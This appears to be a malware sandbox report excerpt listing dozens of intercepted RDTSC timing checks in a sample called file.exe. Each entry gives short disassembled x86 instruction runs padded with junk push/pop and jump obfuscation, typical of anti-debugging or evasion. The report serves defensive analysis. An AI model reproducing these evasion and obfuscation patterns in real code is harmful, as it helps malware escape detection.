                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4436C second address: B44373 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B44373 second address: B4437C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4437C second address: B44380 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4476E second address: B44774 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B44774 second address: B4477E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0AD8C6A9B6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4477E second address: B4479D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F0AD95F8836h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4DC7B second address: B4DCA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jg 00007F0AD8C6A9BEh 0x0000000c pop ebx 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0AD8C6A9C4h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4DCA9 second address: B4DCAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4DCAD second address: B4DCB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4DCB1 second address: B4DCE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0AD95F8831h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0AD95F8836h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4DCE2 second address: B4DCE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4CD1D second address: B4CD27 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0AD95F8826h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4CFE9 second address: B4CFED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4CFED second address: B4D015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0AD95F8839h 0x0000000b pushad 0x0000000c jns 00007F0AD95F8826h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4D173 second address: B4D19A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0AD8C6A9B6h 0x0000000a popad 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0AD8C6A9C9h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4D19A second address: B4D1A1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4D1A1 second address: B4D1B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0AD8C6A9BFh 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4D4B2 second address: B4D4C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F0AD95F882Fh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4DAF4 second address: B4DAF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4DAF8 second address: B4DB02 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0AD95F8826h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4DB02 second address: B4DB08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B50DA4 second address: B50DBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8832h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B55E42 second address: B55E54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F0AD8C6A9BAh 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B177C4 second address: B177CA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B17CF9 second address: 96DB7E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0AD8C6A9BCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d or dword ptr [ebp+122D37EBh], edi 0x00000013 push dword ptr [ebp+122D1595h] 0x00000019 mov dx, 2BEBh 0x0000001d call dword ptr [ebp+122D3589h] 0x00000023 pushad 0x00000024 jng 00007F0AD8C6A9BCh 0x0000002a mov dword ptr [ebp+122D34B1h], eax 0x00000030 xor eax, eax 0x00000032 jmp 00007F0AD8C6A9BEh 0x00000037 add dword ptr [ebp+122D34B1h], ebx 0x0000003d mov edx, dword ptr [esp+28h] 0x00000041 or dword ptr [ebp+122D34B1h], ebx 0x00000047 add dword ptr [ebp+122D34B1h], edi 0x0000004d mov dword ptr [ebp+122D29C9h], eax 0x00000053 mov dword ptr [ebp+122D34B1h], edi 0x00000059 mov esi, 0000003Ch 0x0000005e mov dword ptr [ebp+122D2E75h], edx 0x00000064 add esi, dword ptr [esp+24h] 0x00000068 jg 00007F0AD8C6A9B7h 0x0000006e lodsw 0x00000070 jmp 00007F0AD8C6A9C2h 0x00000075 add eax, dword ptr [esp+24h] 0x00000079 jmp 00007F0AD8C6A9BEh 0x0000007e mov ebx, dword ptr [esp+24h] 0x00000082 mov dword ptr [ebp+122D34B1h], edi 0x00000088 push eax 0x00000089 pushad 0x0000008a push esi 0x0000008b push eax 0x0000008c push edx 0x0000008d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1808D second address: B180BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8835h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jng 00007F0AD95F883Dh 0x00000010 pushad 0x00000011 jmp 00007F0AD95F882Fh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1833B second address: B18341 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B18341 second address: B18348 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B18348 second address: B183AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F0AD8C6A9B8h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 jg 00007F0AD8C6A9BCh 0x0000002a push 00000004h 0x0000002c pushad 0x0000002d mov dword ptr [ebp+122D27B2h], edi 0x00000033 mov ax, di 0x00000036 popad 0x00000037 nop 0x00000038 jnp 00007F0AD8C6A9C8h 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 jnc 00007F0AD8C6A9B6h 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B18A45 second address: B18A4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B18A4A second address: B18A51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B18AC7 second address: B18ACB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B18ACB second address: B18AD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B18AD1 second address: B18B3D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jns 00007F0AD95F882Ch 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jng 00007F0AD95F8826h 0x00000019 popad 0x0000001a popad 0x0000001b nop 0x0000001c push 00000000h 0x0000001e push edi 0x0000001f call 00007F0AD95F8828h 0x00000024 pop edi 0x00000025 mov dword ptr [esp+04h], edi 0x00000029 add dword ptr [esp+04h], 0000001Bh 0x00000031 inc edi 0x00000032 push edi 0x00000033 ret 0x00000034 pop edi 0x00000035 ret 0x00000036 jg 00007F0AD95F882Ch 0x0000003c mov dword ptr [ebp+122D1B38h], ecx 0x00000042 lea eax, dword ptr [ebp+1247D54Ch] 0x00000048 mov edi, 5DFB78C1h 0x0000004d nop 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 jnp 00007F0AD95F8826h 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B18B3D second address: B18B53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B18B53 second address: B18B5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B18B5A second address: B18BBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F0AD8C6A9B8h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 mov di, EE3Dh 0x00000027 or dword ptr [ebp+122D37E6h], esi 0x0000002d lea eax, dword ptr [ebp+1247D508h] 0x00000033 jbe 00007F0AD8C6A9B9h 0x00000039 mov cx, bx 0x0000003c mov edx, 3BB5A890h 0x00000041 nop 0x00000042 push eax 0x00000043 push edx 0x00000044 push edi 0x00000045 jmp 00007F0AD8C6A9C4h 0x0000004a pop edi 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B18BBA second address: B18BBF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B551E6 second address: B551EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B55866 second address: B5587C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0AD95F882Dh 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5A091 second address: B5A0AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0AD8C6A9B6h 0x0000000a pop ecx 0x0000000b push edx 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jp 00007F0AD8C6A9B6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5A0AB second address: B5A0AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5A0AF second address: B5A0B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5A7DB second address: B5A7DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5AC6F second address: B5AC73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5ADCD second address: B5ADD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5B092 second address: B5B0A6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0AD8C6A9B8h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F0AD8C6A9B6h 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B60474 second address: B60478 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5FFFA second address: B6000F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F0AD8C6A9BFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6000F second address: B60014 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B654A5 second address: B654A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B654A9 second address: B654BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 js 00007F0AD95F8826h 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B654BF second address: B654C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B65648 second address: B65652 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B65652 second address: B65658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B65658 second address: B6565C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6565C second address: B65667 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B657CF second address: B657D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B69F02 second address: B69F06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B69F06 second address: B69F21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0AD95F8835h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6A251 second address: B6A25C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6A6AF second address: B6A6B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6A6B3 second address: B6A6BD instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0AD8C6A9B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6A6BD second address: B6A6E3 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0AD95F882Ch 0x00000008 push ebx 0x00000009 ja 00007F0AD95F8826h 0x0000000f pop ebx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F0AD95F882Ch 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6A9BE second address: B6A9DE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007F0AD8C6A9B6h 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0AD8C6A9C0h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6E554 second address: B6E56E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F0AD95F882Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6DDDC second address: B6DE00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F0AD8C6A9B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F0AD8C6A9C3h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6E242 second address: B6E254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0AD95F882Dh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B73851 second address: B73883 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F0AD8C6A9C0h 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0AD8C6A9C6h 0x00000010 ja 00007F0AD8C6A9B6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B739D1 second address: B739D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B73C83 second address: B73CB6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9C1h 0x00000007 jns 00007F0AD8C6A9B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F0AD8C6A9C5h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B73CB6 second address: B73CC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0AD95F882Ah 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B73CC5 second address: B73CE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0AD8C6A9C8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B745A5 second address: B745AF instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0AD95F8832h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B745AF second address: B745B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B74B96 second address: B74B9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B74B9B second address: B74BB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F0AD8C6A9C2h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B74BB4 second address: B74BC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F0AD95F8832h 0x0000000b jns 00007F0AD95F8826h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B753EA second address: B75406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0AD8C6A9C0h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B75406 second address: B7540D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7540D second address: B75456 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0AD8C6A9C9h 0x00000008 push ebx 0x00000009 jmp 00007F0AD8C6A9C8h 0x0000000e pop ebx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jne 00007F0AD8C6A9D2h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F0AD8C6A9BAh 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B75456 second address: B75460 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0AD95F8826h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B791B7 second address: B791BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B79A6A second address: B79A6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B79D20 second address: B79D51 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0AD8C6A9B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnc 00007F0AD8C6A9C2h 0x00000010 jmp 00007F0AD8C6A9BEh 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B84793 second address: B847AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0AD95F8833h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B84A9B second address: B84AC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jne 00007F0AD8C6A9BAh 0x0000000b je 00007F0AD8C6A9BCh 0x00000011 js 00007F0AD8C6A9B6h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F0AD8C6A9BFh 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B84AC8 second address: B84AD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F0AD95F8826h 0x00000009 jne 00007F0AD95F8826h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85459 second address: B8545E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8545E second address: B85479 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F0AD95F8836h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
